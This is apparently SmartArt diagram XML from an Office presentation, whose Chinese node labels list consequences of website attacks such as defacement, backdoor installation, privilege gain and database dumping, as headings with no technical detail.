    <dgm:pt modelId="{9253B889-B0DE-434F-8443-E4FEE56D3906}" type="pres">
      <dgm:prSet presAssocID="{58920F38-F086-464B-BC57-2951E567309F}" presName="parTrans" presStyleLbl="sibTrans2D1" presStyleIdx="6" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0E3B3218-B3E6-1546-86C5-C9B32E05B4A2}" type="pres">
      <dgm:prSet presAssocID="{339A4001-24BD-1E4A-B308-B6407229A837}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="6" presStyleCnt="9" custLinFactNeighborX="35" custLinFactNeighborY="-5667">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4BB9A3C1-DDFE-DB4E-8D16-5331CF699EEB}" type="pres">
      <dgm:prSet presAssocID="{6669D5C1-78FF-BF4F-90EE-F4CB49AC7FF2}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="7" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7FF3ADA1-61A7-AA4E-B780-BB319EFDE73C}" type="pres">
      <dgm:prSet presAssocID="{974520B2-8CA6-3248-A12B-30AE334A9F8D}" presName="child" presStyleLbl="alignAccFollowNode1" presStyleIdx="7" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D1017A8-C5FA-DD40-8733-15805D49E760}" type="pres">
      <dgm:prSet presAssocID="{45EF0EB2-20A2-CE41-BAF3-ABCBBF2A6EA6}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="8" presStyleCnt="9"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B106E1D8-228C-CC46-AC1F-F32B1DA83E27}" type="pres">
      <dgm:prSet presAssocID="{E2E72316-0BCE-2A4F-AAA4-0783A12510BA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50E8FB04-3A06-4C49-8FC4-700EFC322251}" type="presOf" srcId="{B495D759-4FCA-459D-A4AC-AFF3721C091D}" destId="{1D2705B9-1F03-4086-9FF8-1311E873F6E8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{C3BECA0C-4BBB-46FF-AC2F-410AD0EDFC74}" type="presOf" srcId="{60467412-EB0C-434C-AEC9-9C1335149086}" destId="{6173BA66-ACBB-45FF-9F58-E4F9FDB1BDAF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{2390D90E-160B-40A4-A87D-A5BB6C72DAC3}" type="presOf" srcId="{E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}" destId="{C08D936D-FB79-4CF2-8173-3835989193E6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{79C91A11-17D9-464D-AA98-41303991D022}" type="presOf" srcId="{24147C71-AB8B-44C3-843C-F603AC8BDAC3}" destId="{9A5A7F41-1ED1-5548-A436-59721DF09EA7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{4DB8AC12-3D8D-404E-ADF3-BC2C6306D6EC}" srcId="{85334D9B-2A60-384D-B2BD-5E19072AB91E}" destId="{974520B2-8CA6-3248-A12B-30AE334A9F8D}" srcOrd="1" destOrd="0" parTransId="{C3A2581F-1757-3140-A27F-65A9FC479AB7}" sibTransId="{45EF0EB2-20A2-CE41-BAF3-ABCBBF2A6EA6}"/>
    <dgm:cxn modelId="{A4849326-6411-40DA-9DB0-74CCA78908DF}" type="presOf" srcId="{58920F38-F086-464B-BC57-2951E567309F}" destId="{9253B889-B0DE-434F-8443-E4FEE56D3906}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{D7F55D28-36DC-4127-BB1F-A98DBB3023CF}" type="presOf" srcId="{974520B2-8CA6-3248-A12B-30AE334A9F8D}" destId="{7FF3ADA1-61A7-AA4E-B780-BB319EFDE73C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{3E64892C-38C5-4468-9AF1-934B9A66C56C}" srcId="{E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}" destId="{801D1502-F20A-41CA-902A-5DBC40170BCB}" srcOrd="0" destOrd="0" parTransId="{60467412-EB0C-434C-AEC9-9C1335149086}" sibTransId="{86F193EC-1E38-4447-8DB4-5AB450B600B9}"/>
    <dgm:cxn modelId="{08D7EE3B-9E83-4A15-8E59-F2F287FB4FEC}" srcId="{E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}" destId="{EF75F311-8D83-DD47-BF91-FD3432877BC2}" srcOrd="2" destOrd="0" parTransId="{35F5131D-731D-3E4B-93B1-DD889747108B}" sibTransId="{CE1C56F3-DF4C-2049-BED3-5110DD156305}"/>
    <dgm:cxn modelId="{189FD463-5AA1-4423-B1E2-37F5FE942FDA}" type="presOf" srcId="{BA977DC8-B561-4476-AD78-EF855CA64D85}" destId="{31B543F4-8413-4786-958E-9D247EFBA3F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{EEA16946-9E8A-452A-AAFC-C128BE6B5CBF}" srcId="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}" destId="{36B01B6E-1389-40FA-B3D4-B6B78B28B345}" srcOrd="0" destOrd="0" parTransId="{B495D759-4FCA-459D-A4AC-AFF3721C091D}" sibTransId="{D5BDF351-2EE0-4E6A-8B5D-4A3797829AF9}"/>
    <dgm:cxn modelId="{A7D74A6C-73D7-43D2-B72F-CB08A9F7B89A}" srcId="{BA977DC8-B561-4476-AD78-EF855CA64D85}" destId="{E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}" srcOrd="0" destOrd="0" parTransId="{431000AD-47BE-4833-AC6D-E837A917AA4A}" sibTransId="{FEC3E4D1-BFAE-477B-A4C0-34CF62FB8F3F}"/>
    <dgm:cxn modelId="{F9794473-5B45-411D-BA69-33EB6B0117E7}" type="presOf" srcId="{D5BDF351-2EE0-4E6A-8B5D-4A3797829AF9}" destId="{6C6CDCDA-9191-4CCC-BD60-1A487D5768AA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{34A78453-F358-4120-8E49-A86EB18001EE}" srcId="{BA977DC8-B561-4476-AD78-EF855CA64D85}" destId="{85334D9B-2A60-384D-B2BD-5E19072AB91E}" srcOrd="2" destOrd="0" parTransId="{1C616930-0E85-874F-BFAB-77642F204067}" sibTransId="{4B11F0B6-4173-B640-8D43-283FBDCCDBAB}"/>
    <dgm:cxn modelId="{67BB5A59-FE6B-4240-9F72-94D29AF55468}" srcId="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}" destId="{5137D415-60ED-5C4D-907A-749316E30F0D}" srcOrd="1" destOrd="0" parTransId="{3525A068-FDD6-E246-B338-6485A6F18D77}" sibTransId="{E7B3F881-EC7A-0841-B6EC-75AB701EAB5C}"/>
    <dgm:cxn modelId="{5CD26684-1163-467E-9AD9-92CE792324EE}" srcId="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}" destId="{8476FB5D-FED1-4041-97BE-FE42E89C07B0}" srcOrd="2" destOrd="0" parTransId="{9EA5B1FF-6707-7F4E-8FD9-A2350FA5E2B6}" sibTransId="{AD61D7EB-9347-3E40-9C8E-5DC01064118B}"/>
    <dgm:cxn modelId="{B48EBA86-D8C0-4171-A264-D3633FBBBF69}" type="presOf" srcId="{5137D415-60ED-5C4D-907A-749316E30F0D}" destId="{99F6BB5E-BE17-F741-AF6D-7DBE4FC74D97}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{F271DF8B-8AB3-4A10-82C2-4CB588FAED46}" type="presOf" srcId="{85334D9B-2A60-384D-B2BD-5E19072AB91E}" destId="{A89538F6-290A-CA43-AFBE-4A025999F71E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{C92E73A3-858E-4391-B602-E55CBFE48F11}" type="presOf" srcId="{E7B3F881-EC7A-0841-B6EC-75AB701EAB5C}" destId="{442A2723-CCC4-8A4F-A5F7-123936076C6B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{52D276A3-7AB9-4F29-93E7-307008C7DDE3}" type="presOf" srcId="{801D1502-F20A-41CA-902A-5DBC40170BCB}" destId="{B2C0D37F-E97E-465A-88FE-4F69714316BD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{184077AB-A453-43E6-8968-2EDDCEEE517A}" type="presOf" srcId="{36B01B6E-1389-40FA-B3D4-B6B78B28B345}" destId="{8EFD87A1-CD1E-40B3-BE74-2D3837AF0BA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{A7D178AC-2CBC-41F4-A6FD-47272B8D5696}" type="presOf" srcId="{6669D5C1-78FF-BF4F-90EE-F4CB49AC7FF2}" destId="{4BB9A3C1-DDFE-DB4E-8D16-5331CF699EEB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{466A7BAC-50F7-40EA-B2DA-468662E851DD}" srcId="{E25C3A9D-F39D-4329-BEA6-3F1939AF20B2}" destId="{F4DB994D-65A9-435B-90E4-85FBB5EF5119}" srcOrd="1" destOrd="0" parTransId="{36916C9A-ACCD-41EC-80FF-02A82B342DC4}" sibTransId="{24147C71-AB8B-44C3-843C-F603AC8BDAC3}"/>
    <dgm:cxn modelId="{CCB81CC3-C642-4979-9D93-810D6E1D1FCB}" srcId="{85334D9B-2A60-384D-B2BD-5E19072AB91E}" destId="{339A4001-24BD-1E4A-B308-B6407229A837}" srcOrd="0" destOrd="0" parTransId="{58920F38-F086-464B-BC57-2951E567309F}" sibTransId="{6669D5C1-78FF-BF4F-90EE-F4CB49AC7FF2}"/>
    <dgm:cxn modelId="{D5F1C6CC-9D5C-4ED9-97C2-A685D01CE277}" type="presOf" srcId="{8476FB5D-FED1-4041-97BE-FE42E89C07B0}" destId="{C08A805F-9C20-4444-B427-D6D304B9C7B7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{FE22D2CC-007B-4A3D-B581-1320E311518C}" type="presOf" srcId="{F4DB994D-65A9-435B-90E4-85FBB5EF5119}" destId="{3529335B-393C-4877-B529-79367D51A1EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{EE723CD4-75DB-4551-8764-B17D1F52CE5C}" srcId="{85334D9B-2A60-384D-B2BD-5E19072AB91E}" destId="{E2E72316-0BCE-2A4F-AAA4-0783A12510BA}" srcOrd="2" destOrd="0" parTransId="{B6E72754-A750-984A-A67C-D88D76368704}" sibTransId="{0E355EFA-3742-5949-9211-6F634002D066}"/>
    <dgm:cxn modelId="{FE076EE0-7F9C-4C1A-8E21-6F87DD1277BE}" srcId="{BA977DC8-B561-4476-AD78-EF855CA64D85}" destId="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}" srcOrd="1" destOrd="0" parTransId="{252BA8D5-E45E-4AB0-8F01-F4D80C77138C}" sibTransId="{723DDA95-2CC9-4202-940F-D8B17E4EBD6F}"/>
    <dgm:cxn modelId="{7BE766E2-9026-4B6E-849D-31E9A93424A1}" type="presOf" srcId="{EF75F311-8D83-DD47-BF91-FD3432877BC2}" destId="{80D7D441-6FCD-704B-9281-D4576CE3B5D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{2BFF25E8-AD62-43EF-99B6-7CAA152CF978}" type="presOf" srcId="{09C64F33-07FD-4686-9C7A-ABFD5C57262B}" destId="{535FB04B-59D7-4758-B949-33370926E967}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{2A5AC5E9-06F8-455F-8838-250730986A7C}" type="presOf" srcId="{339A4001-24BD-1E4A-B308-B6407229A837}" destId="{0E3B3218-B3E6-1546-86C5-C9B32E05B4A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{2EAFD5F2-BD15-4295-A59C-3F14FC75A881}" type="presOf" srcId="{86F193EC-1E38-4447-8DB4-5AB450B600B9}" destId="{1552FF9C-879A-4EF6-8F21-C3EA90CA04D5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{85CD0CFA-C3BE-46AF-97AB-A628B840402A}" type="presOf" srcId="{45EF0EB2-20A2-CE41-BAF3-ABCBBF2A6EA6}" destId="{7D1017A8-C5FA-DD40-8733-15805D49E760}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{705A4FFA-0CE6-4AB5-A951-F32D4836FBC6}" type="presOf" srcId="{E2E72316-0BCE-2A4F-AAA4-0783A12510BA}" destId="{B106E1D8-228C-CC46-AC1F-F32B1DA83E27}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{CDBEA48E-B6AC-4205-850E-E6ED51B9E62C}" type="presParOf" srcId="{31B543F4-8413-4786-958E-9D247EFBA3F4}" destId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{1F98E356-B326-4032-B5DA-A2265970BCAE}" type="presParOf" srcId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" destId="{C08D936D-FB79-4CF2-8173-3835989193E6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{910BF260-FD30-42DE-A3CC-F6A253ABD570}" type="presParOf" srcId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" destId="{6173BA66-ACBB-45FF-9F58-E4F9FDB1BDAF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{90A41A75-58B9-461C-8DFE-37A1780F930B}" type="presParOf" srcId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" destId="{B2C0D37F-E97E-465A-88FE-4F69714316BD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{0030CBE6-8CEA-42EB-A838-B3CE0DBE03C6}" type="presParOf" srcId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" destId="{1552FF9C-879A-4EF6-8F21-C3EA90CA04D5}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{ACB59BC4-F197-42B1-87F7-39357ACCD67C}" type="presParOf" srcId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" destId="{3529335B-393C-4877-B529-79367D51A1EE}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{F4E16F6F-00F9-4D2E-84B7-08C8CEB51397}" type="presParOf" srcId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" destId="{9A5A7F41-1ED1-5548-A436-59721DF09EA7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{A9E08126-4E16-4207-8162-0D2790D37375}" type="presParOf" srcId="{4F4FEC6F-6079-4C5B-8432-11B9DF651393}" destId="{80D7D441-6FCD-704B-9281-D4576CE3B5D8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{F59FCEF4-195D-4F05-8DD3-CE1A88F9F5AF}" type="presParOf" srcId="{31B543F4-8413-4786-958E-9D247EFBA3F4}" destId="{F93FC68E-4CB8-4174-BE12-C3F05327D359}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{20E17C72-37A7-46CE-998E-3076F8C7D819}" type="presParOf" srcId="{31B543F4-8413-4786-958E-9D247EFBA3F4}" destId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{5DA141DA-4FCC-49B6-99C7-64193380D61F}" type="presParOf" srcId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" destId="{535FB04B-59D7-4758-B949-33370926E967}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{DA9C37B5-84CC-4319-B897-49B2BBE528BA}" type="presParOf" srcId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" destId="{1D2705B9-1F03-4086-9FF8-1311E873F6E8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{7B7D98F7-52B3-4556-9E2A-5AA8E9514CB5}" type="presParOf" srcId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" destId="{8EFD87A1-CD1E-40B3-BE74-2D3837AF0BA9}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{05450448-194C-42FD-AFE9-6CE1C14EA9EB}" type="presParOf" srcId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" destId="{6C6CDCDA-9191-4CCC-BD60-1A487D5768AA}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{9552CB64-3778-4A5A-9F02-13D2941A8B1C}" type="presParOf" srcId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" destId="{99F6BB5E-BE17-F741-AF6D-7DBE4FC74D97}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{E4D37706-B03D-4524-B0A6-B8F29E75894C}" type="presParOf" srcId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" destId="{442A2723-CCC4-8A4F-A5F7-123936076C6B}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{939B07DD-2B47-4A71-93D4-089C5D578F0A}" type="presParOf" srcId="{A6BD517B-5D21-4B0A-B34C-AE696C1EB218}" destId="{C08A805F-9C20-4444-B427-D6D304B9C7B7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{7C1F3214-A41C-4D5A-A29C-4E7B9E973EF6}" type="presParOf" srcId="{31B543F4-8413-4786-958E-9D247EFBA3F4}" destId="{A613BEB1-0D10-46F6-8620-166A950E835D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{2D295695-2681-4EAB-9DC1-8D50562E7241}" type="presParOf" srcId="{31B543F4-8413-4786-958E-9D247EFBA3F4}" destId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{1957908E-4172-4C94-841F-66B98CE5BD5A}" type="presParOf" srcId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" destId="{A89538F6-290A-CA43-AFBE-4A025999F71E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{F3EE1868-406A-43FC-A6E0-28A4184772B0}" type="presParOf" srcId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" destId="{9253B889-B0DE-434F-8443-E4FEE56D3906}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{B36027F0-B8FC-48D1-B3D6-A497AB31E0A7}" type="presParOf" srcId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" destId="{0E3B3218-B3E6-1546-86C5-C9B32E05B4A2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{10C66C0E-2814-430E-BA93-67C721C15197}" type="presParOf" srcId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" destId="{4BB9A3C1-DDFE-DB4E-8D16-5331CF699EEB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{FC1BCC82-1413-4437-8DE9-471B34D4AE42}" type="presParOf" srcId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" destId="{7FF3ADA1-61A7-AA4E-B780-BB319EFDE73C}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{1C392F2E-1FAC-424D-9E4D-55BC4B5786A1}" type="presParOf" srcId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" destId="{7D1017A8-C5FA-DD40-8733-15805D49E760}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess1#1"/>
    <dgm:cxn modelId="{48D116D5-4682-419F-9B5D-5578DAE48F1A}" type="presParOf" srcId="{B2C27025-0830-4E42-8A4E-DDDBA203403F}" destId="{B106E1D8-228C-CC46-AC1F-F32B1DA83E27}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess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4D2E9-642A-4767-B794-B8E0BAE8DBDC}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2008/layout/VerticalCircleList" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple2#1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E7CE103F-1BD0-4B49-877E-C6F681B67092}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>数据库恶意操作（修改金额）</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6944ABA-4A8E-4602-BC54-32ADE84A36F5}" type="parTrans" cxnId="{67618A67-8365-4867-8923-9753C10F8D97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{27FB2DDC-BDEE-42A2-97DF-C883D058C5A5}" type="sibTrans" cxnId="{67618A67-8365-4867-8923-9753C10F8D97}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3F21B0F-7E20-47E7-B2C1-329B104534CD}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>网站挂马（植入网页木马）</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{973600C3-6275-4FAB-BB2C-957C2CF36307}" type="parTrans" cxnId="{D0B8A9A2-C368-4B4F-85EE-EB5791860C32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3950B3C-209F-4945-8B4B-9E65CE224F51}" type="sibTrans" cxnId="{D0B8A9A2-C368-4B4F-85EE-EB5791860C32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD664396-1E55-4208-8738-450A006C6DE6}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>网页篡改（挂标语）</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{233AE539-9CDA-4967-AA7D-2E261BC19CEF}" type="parTrans" cxnId="{FD9FB551-5E99-406F-8199-1C2F38780C06}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBEC06D-9216-46CB-9198-77414934807B}" type="sibTrans" cxnId="{FD9FB551-5E99-406F-8199-1C2F38780C06}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7608F411-8A5D-473C-BCB1-6650A6F49AF1}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>安装后门</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A55469F-84F0-47D4-8FAF-52B424B28559}" type="parTrans" cxnId="{7D122732-FE38-4C4D-8807-B863BA2E8FC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{925218ED-43F9-484F-A58B-21043DF084C7}" type="sibTrans" cxnId="{7D122732-FE38-4C4D-8807-B863BA2E8FC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6E7BFFD3-E359-4580-B56B-B6C4D675F314}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>获取系统权限</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DB46EC8-4E34-44F2-80AE-9104EC34778E}" type="parTrans" cxnId="{1613A2F1-53F7-4FE1-81DC-4B1C50B17106}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF1E424-B6C1-4B73-A93D-851B0851F62D}" type="sibTrans" cxnId="{1613A2F1-53F7-4FE1-81DC-4B1C50B17106}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{493E5AFE-4DA6-4E9A-A8F4-57F65A3B25ED}">
      <dgm:prSet phldrT="[文本]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>数据库信息泄漏（拖库）</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
